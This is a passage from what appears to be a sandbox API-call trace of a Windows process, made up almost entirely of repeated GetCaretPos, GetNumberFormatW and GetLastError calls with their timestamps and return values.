lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.389] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.389] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.389] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.390] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.390] GetLastError () returned 0x57 [0023.390] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.391] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.391] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.391] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.392] GetLastError () returned 0x57 [0023.392] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.392] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.393] GetLastError () returned 0x57 [0023.393] GetCaretPos (in: lpPoint=0x18fb30 | out: lpPoint=0x18fb30) returned 1 [0023.393] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0023.394] GetLastError () returned 0x57 [0023.684] lstrlenA (lpString="") returned 0 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.684] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.685] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] GetCaretPos (in: lpPoint=0x18fa94 | out: lpPoint=0x18fa94) returned 1 [0023.686] 